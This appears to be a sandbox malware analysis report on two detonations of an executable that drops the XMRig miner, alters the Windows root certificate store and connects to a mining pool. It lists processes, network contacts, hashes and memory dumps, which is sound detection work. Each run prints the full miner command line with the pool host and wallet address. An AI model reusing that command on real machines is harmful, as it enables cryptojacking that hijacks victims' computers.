memory/2920-76-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-77-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-78-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-79-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-80-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-81-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-82-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-83-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

memory/2920-84-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1787s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3040-16-0x000002711F5A0000-0x000002711F5C0000-memory.dmp

memory/3040-17-0x000002711F5F0000-0x000002711F610000-memory.dmp

memory/3040-18-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-20-0x000002711F630000-0x000002711F650000-memory.dmp

memory/3040-19-0x000002711F610000-0x000002711F630000-memory.dmp

memory/3040-21-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-22-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-25-0x000002711F630000-0x000002711F650000-memory.dmp

memory/3040-24-0x000002711F610000-0x000002711F630000-memory.dmp

memory/3040-23-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-26-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-27-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-28-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-29-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-30-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-31-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-32-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-33-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-34-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-35-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-36-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-37-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-38-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-39-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-40-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-41-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-42-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-43-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-44-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-45-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-46-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-47-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-48-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-49-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-50-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-51-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-52-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-53-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-54-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-55-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-56-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-57-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-58-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-59-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-60-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-61-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-62-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-63-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-64-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-65-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-66-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-67-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-68-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-69-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-70-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-71-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-72-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-73-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-74-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-75-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-76-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-77-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-78-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-79-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-80-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-81-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-82-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-83-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

memory/3040-84-0x00007FF6B1310000-0x00007FF6B1E13000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:24

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1795s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp

Files

